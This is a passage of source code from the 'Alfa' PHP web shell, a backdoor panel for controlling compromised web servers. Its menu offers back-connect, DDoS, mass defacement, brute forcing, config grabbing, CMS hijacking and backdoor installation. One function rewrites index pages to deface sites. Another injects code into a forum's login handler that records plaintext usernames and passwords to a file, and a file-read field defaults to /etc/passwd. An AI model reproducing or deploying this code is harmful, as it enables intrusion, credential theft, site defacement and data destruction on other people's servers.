</tr>"; if ($GLOBALS["sys"] == "unix") { $useful_downloader = "<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>"; if (!@ini_get("safe_mode")) { if (strlen(alfaEx("id", false, false)) > 0) { echo "<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>"; $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzialfa2", "nc", "locate", "suidperl"); $x = 0; foreach ($userful as $item) { if (alfaWhich($item)) { $x++; echo "<span class="header_values" style="margin-left: 4px;">" . $item . "</span>"; } } if ($x == 0) { echo "<span class='header_values' id='header_useful'>--------------</span>"; $GLOBALS["need_to_update_header"] = "true"; } echo "</td>\xa</tr>
<tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span>"; $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); $x = 0; foreach ($downloaders as $item2) { if (alfaWhich($item2)) { $x++; echo "<span class="header_values" style="margin-left: 4px;">" . $item2 . "</span>"; } } if ($x == 0) { echo "<span class='header_values' id='header_downloader'>--------------</span>"; $GLOBALS["need_to_update_header"] = "true"; } echo "</td>
</tr>"; } else { echo $useful_downloader; $GLOBALS["need_to_update_header"] = "true"; } } else { echo $useful_downloader; $GLOBALS["need_to_update_header"] = "true"; } } else { echo "<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>"; echo alfaEx("ver", false, false); echo "</td>\xa</tr> <tr>\xa<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
</tr></b>"; } $quotes = function_exists("get_magic_quotes_gpc") ? get_magic_quotes_gpc() : "0"; if ($quotes == "1" or $quotes == "on") { $magic = "<b><span class="header_on">ON</span>"; } else { $magic = "<span class="header_off">OFF</span>"; } echo "<tr>
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>" . Alfa_GetDisable_Function() . "</b></td>
</tr>
<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span>" . $curl . " | <span class="header_vars">SSH2 : </span>" . $ssh2 . " | <span class="header_vars">Magic Quotes : </span>" . $magic . " | <span class="header_vars"> MySQL :</span>" . $mysql . " | <span class="header_vars">MSSQL :</span>" . $mssql . " | <span class="header_vars"> PostgreSQL :</span>" . $pg . " | <span class="header_vars"> Oracle :</span>" . $or . " " . ($GLOBALS["sys"] == "unix" ? "| <span class="header_vars"> CGI :</span> " . $cgi_shell : '') . "</td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></div></td>\xa</tr>\xa<tr>
<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>" . $open_b . "</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>" . $safe_exe . "</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>" . $safe_include . "</b></td>\xa</tr>\xa<tr>\xa<td height="11"><span class="header_vars">SoftWare: </span></td>\xa<td colspan="2"><b>" . @getenv("SERVER_SOFTWARE") . "</b></td>
</tr>"; if ($GLOBALS["sys"] == "win") { echo "<tr>\xa<td height="12"><span class="header_vars">DRIVE:</span></td>
<td colspan="2"><b>" . $drives . "</b></td>\xa</tr>"; } echo "<tr>\xa<td height="12"><span class="header_vars">PWD:</span></td>
<td colspan="2"><span id="header_cwd">" . $cwd_links . " </span><a href="#action=fileman&path=" . $GLOBALS["home_cwd"] . "" onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')"><span class="home_shell">[ Home Shell ]</span> </a></td>\xa</tr>\xa</table>
</div>\xa<div id="meunlist">
<ul>\xa"; $li = array("proc" => "Process", "phpeval" => "Eval", "sql" => "SQL Manager", "dumper" => "Database Dumper", "coldumper" => "Column Dumper", "hash" => "En-Decoder", "connect" => "BC", "zoneh" => "ZONE-H", "dos" => "DDOS", "safe" => "ByPasser", "cgishell" => "Cgi Shell", "ssiShell" => "SSI SHELL", "cpcrack" => "Hash Tools", "portscanner" => "Port Scaner", "basedir" => "Open BaseDir", "mail" => "Fake Mail", "ziper" => "Compressor", "deziper" => "DeCompressor", "IndexChanger" => "Index Changer", "pwchanger" => "Add New Admin", "ShellInjectors" => "Shell Injectors", "php2xml" => "PHP2XML", "cloudflare" => "CloudFlare", "Whmcs" => "Whmcs DeCoder", "symlink" => "Symlink", "MassDefacer" => "Mass Defacer", "Crackers" => "BruteForcer", "searcher" => "Searcher", "config_grabber" => "Config Grabber", "fakepage" => "Fake Page", "archive_manager" => "Archive Manager", "cmshijacker" => "CMS Hijacker", "remotedl" => "Remote Upload", "inbackdoor" => "Install BackDoor", "whois" => "Whois", "selfrm" => "Remove Shell"); foreach ($li as $key => $value) { echo "<li><a id="menu_opt_" . $key . "" href="#action=options&path=" . $GLOBALS["cwd"] . "&opt=" . $key . "" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&path='+c_+'&opt=" . $key . "';g('" . $key . "',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">" . $value . "</a></li>" . "\xa"; } echo "</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&path=" . $GLOBALS["cwd"] . "&opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&path='+c_+'&opt=settings';g('settings',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Alfa Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&path=" . $GLOBALS["cwd"] . "&opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&path='+c_+'&opt=market';g('market',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&path=" . $GLOBALS["cwd"] . "&opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&path='+c_+'&opt=aboutus';g('aboutus',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">About Us</a>" . (!empty($_COOKIE["AlfaUser"]) && !empty($_COOKIE["AlfaPass"]) ? "<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>" : '') . "</div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="" . $GLOBALS["cwd"] . "" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,'/',1);">New Tab +</div></div>"; } else { @error_reporting(E_ALL ^ E_NOTICE); @ini_set("error_log", NULL); @ini_set("log_errors", 0); @ini_set("max_execution_time", 0); @ini_set("magic_quotes_runtime", 0); @set_time_limit(0); } } goto uDqvN; EM0SY: function Alfa_Rewriter($dir, $file, $defpage, $m = "index") { if (!@is_writable($dir)) { return false; } if (!@is_readable($dir)) { return false; } $defpage = @file_get_contents($defpage); if ($m == "index") { $indexs = array("index.php", "index.htm", "index.html", "default.asp", "default.aspx", "index.asp", "index.aspx", "index.js"); if (in_array(strtolower($file), $indexs)) { @file_put_contents($dir, $defpage); echo @is_file($dir) ? $dir . "<b><font color='red'>DeFaced...</b></font><br>" : ''; } } elseif ($m == "all") { @file_put_contents($dir, $defpage); echo @is_file($dir) ? $dir . "  <b><font color='red'>DeFaced...</b></font><br>" : ''; } } goto JTLAP; vrEEO: function alfadeziper() { alfahead(); AlfaNum(8, 9, 10); echo "<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>\xa<form onSubmit="g('deziper',null,null,null,this.dirzip.value,this.zipfile.value,'>>');return false;" method="post">
<div class="txtfont">File: </div> <input type="text" name="dirzip" value="" . (!empty($_POST["alfa3"]) ? htmlspecialchars($_POST["alfa3"]) : htmlspecialchars($GLOBALS["cwd"])) . "" size="60"/>\xa<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="" . $GLOBALS["cwd"] . "" size="60"/>\xa<input type="submit" value=" " name="ziper" />
</form></center></p>"; if (isset($_POST["alfa5"]) && $_POST["alfa5"] == ">>") { $dirzip = $_POST["alfa3"]; $zipfile = $_POST["alfa4"]; if (@(!is_dir($zipfile))) { @mkdir($zipfile, 511, true); } $finfo = ''; $file_type = ''; if (function_exists("finfo_open")) { $finfo = @finfo_open(FILEINFO_MIME_TYPE); $file_type = @finfo_file($finfo, $dirzip); @finfo_close($finfo); } else { if ($GLOBALS["sys"] == "unix" && _alfa_can_runCommand(true, true)) { $file_type = alfaEx("file -b --mime-type " . $dirzip); } } if ($GLOBALS["sys"] != "unix" && _alfa_can_runCommand(true, true)) { alfaEx("powershell expand-archive -path '" . addslashes($dirzip) . "' -destinationpath '" . addslashes(basename($zipfile)) . "'"); echo __pre() . "<center><p>Done -> <b><font color="green">" . $zipfile . "</font></b></p></center>"; } elseif ($GLOBALS["sys"] == "unix" && !empty($file_type) && _alfa_can_runCommand(true, true) && (strlen(alfaEx("which unzip")) > 0 || strlen(alfaEx("which tar")) > 0 || strlen(alfaEx("which gunzip")) > 0)) { switch ($file_type) { case "application/zip": alfaEx("cd '" . addslashes($zipfile) . "';unzip '" . addslashes($dirzip) . "'"); break; case "application/x-tar": case "application/x-gzip": case "application/x-gtar": if (strstr(basename($dirzip), ".tar.gz") || strstr(basename($dirzip), ".tar")) { alfaEx("cd '" . addslashes($zipfile) . "';tar xzf '" . addslashes($dirzip) . "'"); } else { alfaEx("cd '" . addslashes($zipfile) . "';gunzip '" . addslashes($dirzip) . "'"); } break; } echo __pre() . "<center><p>Done -> <b><font color="green">" . $zipfile . "</font> <a style="cursor:pointer;" onclick="g('FilesMan','" . $zipfile . "');">[ View Folder ]</a></b></p></center>"; } elseif (class_exists("ZipArchive")) { $itsok = false; if (emtpy($file_type)) { $file_type = "application/zip"; } switch ($file_type) { case "application/zip": $zip = new ZipArchive(); $res = $zip->open($dirzip); if ($res) { $zip->extractTo($zipfile); $zip->close(); $itsok = true; } break; case "application/x-tar": case "application/x-gzip": case "application/x-gtar": if (strstr(basename($dirzip), ".tar.gz")) { $new_file = $zipfile . "/" . basename($dirzip); @copy($dirzip, $new_file); $new_tar = str_replace(".tar.gz", ".tar", $new_file); try { $p = new PharData($new_file); $p->decompress(); $phar = new PharData($new_tar); $phar->extractTo($zipfile); @unlink($new_file); @unlink($new_tar); $itsok = true; } catch (Exception $e) { } } else { try { $phar = new PharData($dirzip); $phar->extractTo($zipfile); $itsok = true; } catch (Exception $e) { } } break; } if ($itsok) { echo __pre() . "<center><p><font color="green">Success...!<br>" . $zipfile . "</font> <a style="cursor:pointer;" onclick="g('FilesMan','" . $zipfile . "');">[ View Folder ]</a></p></center>"; } else { echo __pre() . "<center><p><font color="red">ERROR!!!...</font></p></center>"; } } } echo "</div>"; alfafooter(); } goto UCtms; iZBHY: define("__ALFA_CODE_NAME__", "Tesla"); goto ZnLJg; L8sC_: function hijackIPB($path, $saveto) { $code = "$Alfa_q = $this->DB->buildAndFetch(array('select' => 'email', 'from' => 'members', 'where' => 'name="'.$username.'" OR email="'.$email.'"'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST['ips_username'].' : '.$_POST['ips_password'].' ( '.$Alfa_q['email'].' )'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);"; $find = "unset( $member['plainPassword'] );"; $code = str_replace("{saveto_path}", $saveto, $code); $login = $path . "/admin/sources/handlers/han_login.php"; $evil_login = "\x9" . $find . "
	" . $code; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto tOoun; BhkkX: function alfafooter() { if (!isset($_POST["ajax"])) { echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
<tr>\xa<td width='17%'><form onsubmit="if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
<td width='21%'><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
<td width='22%'><form onsubmit="g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
<td width='19%'><form onsubmit="if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
</tr>
<tr>\xa<td colspan='2'><form onsubmit='g("FilesMan",this.c.value,"");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='" . htmlspecialchars($GLOBALS["cwd"]) . "'> <input type='submit' value=' '></form></td>
<td colspan='2'><form onsubmit="editor(this.file.value,'view','','','','file');return false;"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
</tr>
<tr>
<td colspan='4'><form style='margin-top: 10px;' onsubmit="return false;" autocomplete='off'><span><span class='footer_text'>Execute :</span><br><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'><img style='width:28px;vertical-align: middle;' src='http://solevisible.com/icons/menu/terminal.svg'> Terminal</button><br></form></td>
</tr>\xa<tr>\xa<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
<input type='hidden' name='a' value='FilesMAn'>\xa<input type='hidden' name='c' value='" . $GLOBALS["cwd"] . "'>\xa<input type='hidden' name='ajax' value='true'>\xa<input type='hidden' name='alfa1' value='uploadFile'>\xa<input type='hidden' name='charset' value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xa<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value=' '></form><div id='alfa-copyright'><span class='copyright'>[ ./AlfaTeam &copy; 2012-" . date("Y") . " ]</span><br><span><a href='javascript:void(0);' onclick='alert("BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo");' style='color: #E91E63;text-decoration: none;'>Donate Us !</a></span> <span style='letter-spacing: 2px;color: #dfff00;'>solevisible[at]gmail.com</span> <span><a style='color: #ff6060;text-decoration: none;' target='_blank' href='https://telegram.me/solevisible'>@solevisible</a></span></div></td>
</tr>
</table>
</div>
\xa<div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize("options_window");'></div><div onClick='editorClose("options_window");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>
\xa<div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize("database_window");'></div><div onClick='editorClose("database_window");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;'></div></div></div></div>
\xa<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize("cgiloader");'></div><div onClick='editorClose("cgiloader");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>\xa<div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize("editor");'></div><div onClick='editorClose("editor");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>\xa<div id='update-content'></div>
<div id='database_window-minimized' onclick='showEditor("database_window");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>\xa<div id='options_window-minimized' onclick='showEditor("options_window");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>
<div id='editor-minimized' onclick='showEditor("editor");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>
<div id='cgiloader-minimized' onclick='showEditor("cgiloader");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>
<div id='rightclick_menu'>
  <a target='_blank' href='' name='newtab'><img src="http://solevisible.com/icons/menu/newtab.svg"> Open in new tab</a>\xa  <a target='_blank' href='' name='link'><img src="http://solevisible.com/icons/menu/link.svg"> Open file directly</a>
  <a href='javascript:void(0);' name='download'><img src="http://solevisible.com/icons/menu/download2.svg"> Download</a>
  <a href='' name='view'><img src="http://solevisible.com/icons/menu/view.svg"> View</a>
  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src="http://solevisible.com/icons/menu/view.svg"> View Archive</a>\xa  <a href='' name='edit'><img src="http://solevisible.com/icons/menu/edit.svg"> Edit</a>\xa  <a href='javascript:void(0);' onclick='alfaPopupAction(this, "move");' ftype='' path='' fname='' href='' href='' name='move'><img src="http://solevisible.com/icons/menu/move.svg"> Move</a>
  <a href='javascript:void(0);' onclick='alfaPopupAction(this, "copy");' ftype='' path='' fname='' href='' name='copy'><img src="http://solevisible.com/icons/menu/copy.svg"> Copy</a>
  <a href='javascript:void(0);' onclick='alfaPopupAction(this, "rename");' ftype='' path='' fname='' name='rename'><img src="http://solevisible.com/icons/menu/rename.svg">  Rename</a>
  <a href='javascript:void(0);' onclick='alfaPopupAction(this, "modify");' ftype='' path='' fname='' name='modify'><img src="http://solevisible.com/icons/menu/time.svg">  Modify</a>\xa  <a href='javascript:void(0);' onclick='alfaPopupAction(this, "permission");' name='permission'><img src="http://solevisible.com/icons/menu/key.svg"> Change Permissions</a>\xa  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src="http://solevisible.com/icons/menu/resize.svg"> Compress</a>
  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src="http://solevisible.com/icons/menu/increase.svg"> Extract</a>\xa  <a href='javascript:void(0);' name='delete'><img src="http://solevisible.com/icons/menu/delete.svg"> Delete</a>
</div>
<div id="filesman-tab-full-path"></div>
<div id='alert-area' class='alert-area'></div>
<div class='cl-popup-fixed' style='display:none;'>\xa\x9<div id='shortcutMenu-holder'>\xa\x9\x9<div class='popup-head'></div>\xa\x9\x9\x9<form autocomplete='off' onSubmit='return false;'>
		\x9	<label class='old-path-lbl'></label>
\x9\x9		<div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>
		\x9\x9<label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>\xa				<input type='text' name='fname'>
\x9\x9\x9\x9<div class='perm-table-holder'>\xa\x9\x9	\x9	<table>
					   <tbody>
\x9\x9\x9\x9\x9      <tr>
\x9\x9\x9	\x9         <td><b>Mode</b></td>
\x9\x9	\x9	         <td>User</td>
	\x9	\x9\x9         <td>Group</td>\xa\x9\x9\x9\x9\x9         <td>World</td>
\x9			\x9      </tr>\xa\x9\x9\x9	\x9      <tr>
	\x9\x9		         <td>Read</td>\xa\x9		\x9	         <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>
	\x9		\x9         <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>\xa					         <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>
\x9\x9\x9	\x9      </tr>
\x9	\x9\x9\x9      <tr>\xa	\x9\x9	\x9         <td>Write</td>\xa\x9\x9	\x9	         <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>\xa		\x9\x9\x9         <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>\xa	\x9	\x9	         <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>\xa\x9\x9	\x9\x9      </tr>
\x9\x9			      <tr>\xa				\x9         <td>Execute</td>
\x9				         <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>\xa\x9\x9\x9	\x9         <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>
\x9\x9\x9\x9	         <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>\xa\x9\x9\x9\x9	      </tr>
\x9	\x9		      <tr>\xa\x9\x9	\x9\x9         <td>Permission</td>\xa\x9	\x9\x9	         <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, "u", ["u"]);'></td>
		\x9		         <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, "g", ["g"]);'></td>
			\x9\x9         <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, "w", ["w"]);'></td>\xa\x9\x9	\x9	      </tr>
		\x9\x9\x9   </tbody>
					</table>
\x9\x9\x9	</div>\xa\xa		\x9</form>\xa	\x9<div class='popup-foot'>
\x9		<button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>\xa\x9\x9\x9<button style='background: #9e2c2c;' onclick='d.querySelector(".cl-popup-fixed").style.display="none";'>Cancell</button>
	\x9</div>\xa\x9</div>
</div>"; ?> 
<script> 
function alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&"edit"!=e.post.alfa2&&"delete"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href='javascript:void(0);' onclick='g(\"FilesTools\",null,\""+s+'","download");\'><span>Download: '+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r='<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="'+a+'" placeholder="Filter Table" target=".cls-'+i+'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';for(var o in e)null!=e[o]&&(r+="<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='"+e[o].name+"'>&nbsp;<a class='db-opt-id' db_target='"+i+"' db_id='"+a+"' href='javascript:void(0);' onclick=\"alfaLoadTableData(this, '"+e[o].name+"')\"><span class='mysql_tables' style='font-weight:unset;'>"+e[o].name+"</span></a>"+(l?" <small><span style='font-weight:unset;' class='mysql_table_count'>("+e[o].count+")</span></small>":"&nbsp;")+"</div></li>");r+='</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="'+a+'" class="db-opt-id" target=".cls-'+i+'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="'+a+'" target=".cls-'+i+'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="'+a+'" class="db-opt-id" db_target="'+i+'" target=".cls-'+i+'" class="db-opt-id">Do it</button><div class="dump-file-holder" 